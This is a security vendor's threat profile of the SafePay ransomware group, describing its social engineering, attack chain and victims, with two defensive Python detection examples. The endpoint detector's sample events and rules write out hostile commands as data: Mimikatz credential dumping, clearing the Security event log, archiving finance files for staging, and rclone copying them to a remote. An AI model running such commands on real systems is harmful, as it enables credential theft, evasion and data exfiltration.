
SafePay: Email bombs, phone scams and really big ransoms
When it comes to choosing a brand name, “SafePay” must be among the most boring of choices. It sounds more like a payment app than an organized crime group. There are no dragons or bugs or heads full of snakes, but the group behind the brand is skilled and ruthless. SafePay has been making a name for itself with strong encryption, data exfiltration and big ransom demands from a fast-growing list of victims.
SafePay ransomware was first observed in October 2024, and later confirmed to have been active at least one month earlier. By the end of the first quarter of 2025, SafePay claimed over 200 victims, including managed service providers (MSPs) and small-to-midsize businesses (SMBs) across multiple sectors. The group has been relentless, claiming between 58 and 70 victims in May 2025, which made it the most active ransomware group that month.
Who is SafePay?
Let’s start with the brand. The name “SafePay” may be an attempt to make the group look trustworthy, or to create confusion by borrowing the name of legitimate payment and security products. Sharing a name with legitimate, potentially trusted software helps the group’s tooling blend into process lists and lends credibility to social engineering campaigns and phishing emails. There’s no publicly available evidence of any significance or meaning behind the name, so perhaps there's no meaning at all.
The SafePay ransomware operators refer to themselves as the "SafePay team." The group does not offer a ransomware-as-a-service (RaaS) program, which suggests SafePay is a centralized operation that manages its own infrastructure, operations and negotiations.
Experts speculate SafePay is managed by experienced threat actors who have rebranded or migrated from another ransomware group. There are significant similarities between the SafePay and LockBit ransomware binaries; SafePay is most similar to LockBit 3.0, whose builder was leaked in 2022. Analysis by Yelisey Boguslavskiy found similarities between SafePay and Conti attacks, suggesting that SafePay may include former members of Conti and other groups. Boguslavskiy also speculates that the growth of SafePay in 2024 may have been a primary reason for the collapse of Black Basta. Taken together, this suggests SafePay was formed through an intentional and strategic acquisition of talent from established threat groups.
There is no publicly confirmed location of the SafePay operators, but there is some evidence pointing to an Eastern European ‘home base.’ The SafePay binary includes a kill switch that stops it from running on systems whose default language is Russian or another Cyrillic-script language. A language kill switch of this kind is one of the most common indicators that a group operates in that region and wants to avoid attacking domestic targets.
Since SafePay is not a RaaS operation, we do not have recruitment posts or affiliate rules that might hint at its location. Victim location data shows us that SafePay appears to prefer targeting victims in the US and Germany. Here’s the breakdown by country:
SafePay and social engineering
SafePay attacks rely heavily on social engineering tactics. One of the group’s signature moves is to disrupt a company’s workforce by sending a large volume of spam emails to the employees. Researchers observed one attack deliver over 3,000 of these spam messages within 45 minutes.
The attackers then take advantage of the chaos caused by the spam attack by using Microsoft Teams to contact the employees through an audio or video call or a text message. The threat actor impersonates a member of the company’s tech support and offers to resolve the problems caused by the email attack. If the caller is successful, they convince the employee to grant remote access to the system through a tool like Microsoft Quick Assist. The Microsoft Security blog has a step-by-step walkthrough of how Black Basta used this method to gain initial access. If you aren’t familiar with how these attacks work, consider reviewing that blog post and this Microsoft article on securing Microsoft Teams.
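The email flood is noisy by design, which also makes it detectable: a single mailbox suddenly receiving thousands of messages from many unrelated senders looks nothing like normal traffic. The following is an added example for this article, not SafePay tooling or a Barracuda product feature. It runs a sliding-window count per recipient over mail-gateway log lines. The log format, the constructed sample lines and the thresholds are assumptions (the thresholds are set low so the small sample triggers; the 3,000-in-45-minutes burst described above is roughly 67 messages per minute). The distinct-sender floor is also an assumption: a flood assembled from many sign-up and newsletter senders is different from a single bulk sender, which an ordinary per-sender rate limit already catches.

```python
"""Flag a mail-bomb burst per recipient from mail-gateway log lines.

Added example for this article, not SafePay tooling or Barracuda product code.
The log format, thresholds and sample lines are constructed for illustration.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed gateway log: one accepted message per line, "<ISO time> <recipient> <sender>".
SAMPLE_LOG = """\
2025-05-12T09:00:02 alice@corp.example news@shop-a.example
2025-05-12T09:00:05 alice@corp.example signup@forum-b.example
2025-05-12T09:00:09 bob@corp.example hr@corp.example
2025-05-12T09:00:11 alice@corp.example noreply@site-c.example
2025-05-12T09:00:14 alice@corp.example welcome@store-d.example
2025-05-12T09:00:20 alice@corp.example digest@list-e.example
2025-05-12T09:00:27 alice@corp.example promo@shop-f.example
2025-05-12T09:00:33 alice@corp.example confirm@app-g.example
2025-05-12T09:00:40 alice@corp.example account@site-h.example
2025-05-12T09:00:45 alice@corp.example verify@svc-i.example
2025-05-12T09:01:02 alice@corp.example newsletter@pub-j.example
2025-05-12T09:30:00 bob@corp.example partner@vendor.example
"""


def parse_log(text):
    """Parse the constructed format into (timestamp, recipient, sender) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, rcpt, sender = line.split()
        events.append((datetime.fromisoformat(ts), rcpt.lower(), sender.lower()))
    return sorted(events, key=lambda e: e[0])


def detect_mail_bombs(text, window=timedelta(minutes=5), threshold=10, min_senders=5):
    """Return {recipient: details} for each mailbox that received at least
    `threshold` messages from at least `min_senders` distinct senders inside
    any sliding `window`. Only the first crossing per recipient is reported."""
    recent = defaultdict(deque)   # recipient -> (timestamp, sender) pairs still inside the window
    alerts = {}
    for ts, rcpt, sender in parse_log(text):
        q = recent[rcpt]
        q.append((ts, sender))
        while ts - q[0][0] > window:   # evict messages that fell out of the window
            q.popleft()
        senders = {s for _, s in q}
        if rcpt not in alerts and len(q) >= threshold and len(senders) >= min_senders:
            alerts[rcpt] = {
                "count": len(q),
                "distinct_senders": len(senders),
                "first": q[0][0].isoformat(),
                "last": ts.isoformat(),
            }
    return alerts


if __name__ == "__main__":
    for rcpt, info in detect_mail_bombs(SAMPLE_LOG).items():
        print(f"{rcpt}: {info['count']} messages from {info['distinct_senders']} senders "
              f"between {info['first']} and {info['last']}")
```

An alert from this check is also a useful trigger for the help desk: if a mailbox is being flooded, any unsolicited "tech support" contact to that user in the following hours deserves extra verification.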
Let’s note a few things here. First and most importantly, this is an example of threat actors turning the company help desk into an attack vector. In this attack, the help desk is being impersonated, and the threat actor is depending on the employee not knowing the difference between a threat actor and legitimate tech support. Chaos ransomware is currently using a variation of this attack, and we’ve seen this in the past with Black Basta and others. You can combat this type of attack through employee training and security policies that require verification for help desk support. See this RSA blog for more on help desk security.
Another significant point here is that voice phishing (vishing) attacks are often carried out by threat actors that specialize in phone fraud. These ‘callers’ or ‘talkers’ advertise their services on crime forums or marketplaces. Organized caller groups may offer vishing-as-a-service and specialized scams like getting victims to approve MFA prompts. You may also find recruitment posts like this one:
Callers are usually fluent in English and other languages, and they have strong verbal and conversational skills. The role of a caller is to call a target, impersonate a trusted figure, and manipulate the victim into participating in the scam. This is a special type of con that some ransomware groups want to hand off to someone else. Whether a group uses internal or third-party callers, you cannot assume that a vishing scammer will have a noticeable accent or an AI voice.
You can see examples of attempted vishing scams and aggressive callers in ‘scambaiting’ videos on YouTube. Fair warning: Some scambaiters remove offensive language and phrases, but you may want to assume all scambaiting content is inappropriate for work and kids.
SafePay attack chain
Aside from social engineering, SafePay has been observed using stolen credentials, weak/default passwords, exploits and security misconfiguration to gain access to systems. They may establish access on their own or purchase access from an initial access broker (IAB). After initial access is established, the attack proceeds through the typical steps.
Privilege escalation: Once inside the network, attackers escalate privileges to gain deeper control. Techniques include exploiting unpatched operating system vulnerabilities and weak configurations, and stealing credentials with tools like Mimikatz. This moves the attack from basic user access to administrator or SYSTEM-level rights. If successful, the attackers have largely unfettered access in the subsequent phases of the attack.
Lateral movement: Attackers move through the network to discover sensitive data and additional resources. By this point, they are using several "living-off-the-land" techniques to map the network and carry out other steps in the attack.
Defense evasion: The attackers attempt to disable antivirus, clear event logs, obfuscate malicious code, and modify registry settings to turn off security alerts. SafePay also attempts to establish persistence, usually by modifying startup items or configuring remote access software. Persistence is used to resume an interrupted attack and to keep long-term access to the system if needed.
Data collection & exfiltration: Data is identified, collected, and compressed for exfiltration. SafePay has been observed using WinRAR and 7-Zip for compression, and RClone and FileZilla FTP for data transfer.
Encryption & extortion: Once critical data has been exfiltrated, the ransomware payload encrypts the files and renames each with a .safepay file extension. SafePay drops a ransom note (readme_safepay.txt) with payment instructions and threats of data exposure on leak sites.
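Each of the stages above leaves telemetry, and the useful detection is the correlation across stages on one host rather than any single indicator. The following is an added example for this article, not SafePay code or Barracuda product logic. It matches constructed endpoint events (process creations and file writes) against only the indicators the text names (Mimikatz, event log clearing, WinRAR/7-Zip archiving, RClone/FileZilla transfer, the .safepay extension and readme_safepay.txt) and reports how far the chain progressed per host. The event schema, sample events, hostnames and the matching patterns are assumptions.

```python
"""Correlate constructed endpoint telemetry against SafePay attack-chain stages.

Added example for this article, not SafePay code or Barracuda product logic.
Event schema, sample events and rules are assumptions built from the
indicators named in the article.
"""
import re
from collections import defaultdict

STAGE_ORDER = ["credential_access", "defense_evasion", "collection", "exfiltration", "impact"]

# (stage, event type, pattern) -- process rules search "image cmdline", file rules search the path.
# Matching Mimikatz by module syntax (sekurlsa::, lsadump::) also catches a renamed binary.
RULES = [
    ("credential_access", "process", re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I)),
    ("defense_evasion", "process", re.compile(r"wevtutil(\.exe)?\s+cl\b|Clear-EventLog", re.I)),
    ("collection", "process", re.compile(r"\b(7z|7za|winrar|rar)(\.exe)?\s+a\b", re.I)),
    ("exfiltration", "process", re.compile(r"\b(rclone|filezilla)(\.exe)?\b", re.I)),
    ("impact", "file", re.compile(r"\.safepay$|[\\/]readme_safepay\.txt$", re.I)),
]

# Constructed sample telemetry: one compromised workstation and one doing ordinary work.
SAMPLE_EVENTS = [
    {"ts": "2025-06-03T10:02:11", "host": "WS-042", "type": "process",
     "image": "C:\\Users\\Public\\mimi.exe",
     "cmdline": "mimi.exe privilege::debug sekurlsa::logonpasswords"},
    {"ts": "2025-06-03T10:05:40", "host": "WS-042", "type": "process",
     "image": "C:\\Windows\\System32\\wevtutil.exe", "cmdline": "wevtutil cl Security"},
    {"ts": "2025-06-03T10:20:05", "host": "WS-042", "type": "process",
     "image": "C:\\Program Files\\7-Zip\\7z.exe",
     "cmdline": "7z.exe a -pS3cret -mhe=on D:\\stage\\fin.7z \\\\fs01\\finance\\*.xlsx"},
    {"ts": "2025-06-03T10:41:30", "host": "WS-042", "type": "process",
     "image": "C:\\Users\\Public\\rclone.exe", "cmdline": "rclone.exe copy D:\\stage remote:drop"},
    {"ts": "2025-06-03T11:15:00", "host": "WS-042", "type": "file",
     "path": "D:\\finance\\Q1_report.xlsx.safepay"},
    {"ts": "2025-06-03T11:15:01", "host": "WS-042", "type": "file",
     "path": "D:\\finance\\readme_safepay.txt"},
    # Benign: 7-Zip extracting ("x"), not creating ("a") an archive.
    {"ts": "2025-06-03T10:30:00", "host": "WS-007", "type": "process",
     "image": "C:\\Program Files\\7-Zip\\7z.exe", "cmdline": "7z.exe x update.zip"},
]


def classify(event):
    """Return the attack-chain stage an event matches, or None."""
    if event["type"] == "process":
        haystack = f"{event.get('image', '')} {event.get('cmdline', '')}"
    else:
        haystack = event.get("path", "")
    for stage, etype, pattern in RULES:
        if etype == event["type"] and pattern.search(haystack):
            return stage
    return None


def verdict(stages):
    """Severity from how far the chain progressed on a host."""
    if "impact" in stages:
        return "ransomware_chain"
    if "exfiltration" in stages:
        return "exfiltration_suspected"
    return "early_stage"


def analyze(events):
    """Group first-seen stage hits by host; hosts with no hits are omitted."""
    first_seen = defaultdict(dict)   # host -> stage -> timestamp of first matching event
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage and stage not in first_seen[ev["host"]]:
            first_seen[ev["host"]][stage] = ev["ts"]
    report = {}
    for host, stages in first_seen.items():
        ordered = [s for s in STAGE_ORDER if s in stages]
        report[host] = {"stages": ordered, "first_seen": stages, "verdict": verdict(ordered)}
    return report


if __name__ == "__main__":
    for host, info in analyze(SAMPLE_EVENTS).items():
        print(f"{host}: {info['verdict']} via {' -> '.join(info['stages'])}")
```

In practice the collection and exfiltration rules are where tuning matters most: archivers and sync tools are legitimate on many hosts, so the alert worth paging on is the sequence (credential theft, then log clearing, then archiving, then an outbound transfer tool) appearing on one host within hours, not any one of them alone.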
Motivation & notable victims
SafePay is a financially driven ransomware operation, which is demonstrated by the consistent use of double extortion (encryption + data leaks) and this text from the ransom note:
We are not a politically motivated group and want nothing more than money.
Ransom demands from SafePay are substantial, typically calculated as 1-3% of the victim's annual revenue. A ransom demand may be reduced significantly if the victim faces regulatory repercussions for paying a ransom.
One of SafePay’s most high-profile victims is Ingram Micro, a global IT distribution and services company. The attack was confirmed in early July 2025, though Ingram Micro did not name the attacker. Researchers linked the incident to SafePay based on evidence posted on the group's leak site and threat intelligence shared by Dark Web monitoring services. The attack disrupted core operations globally, and industry analysts estimated losses of at least $136 million in sales each day that it could not fulfill orders.
SafePay attacked Microlise in October 2024. Microlise is a UK-based company that provides transport management technology solutions like fleet tracking, driver communications, vehicle health & safety, and so on. This disrupted Microlise customers’ operations, including DHL deliveries and security systems in the prisoner vans used by the UK Ministry of Justice.
Protect yourself
Defending against SafePay ransomware requires a complete cybersecurity strategy. This includes technical controls such as multi-factor authentication, regular patching, strong endpoint detection and response, and network segmentation. It’s becoming increasingly important to train employees on vishing and other social engineering attacks. And of course, all companies should have a complete anti-ransomware backup solution in place, and teams should regularly test the recovery process.
Barracuda can help
Don’t wait to get protected. The best time to fight ransomware is before it strikes. Safeguard your business with ransomware protection solutions that block phishing emails, protect your web applications and secure your business-critical data. With guidance from cybersecurity experts, you can build a ransomware protection plan for your business.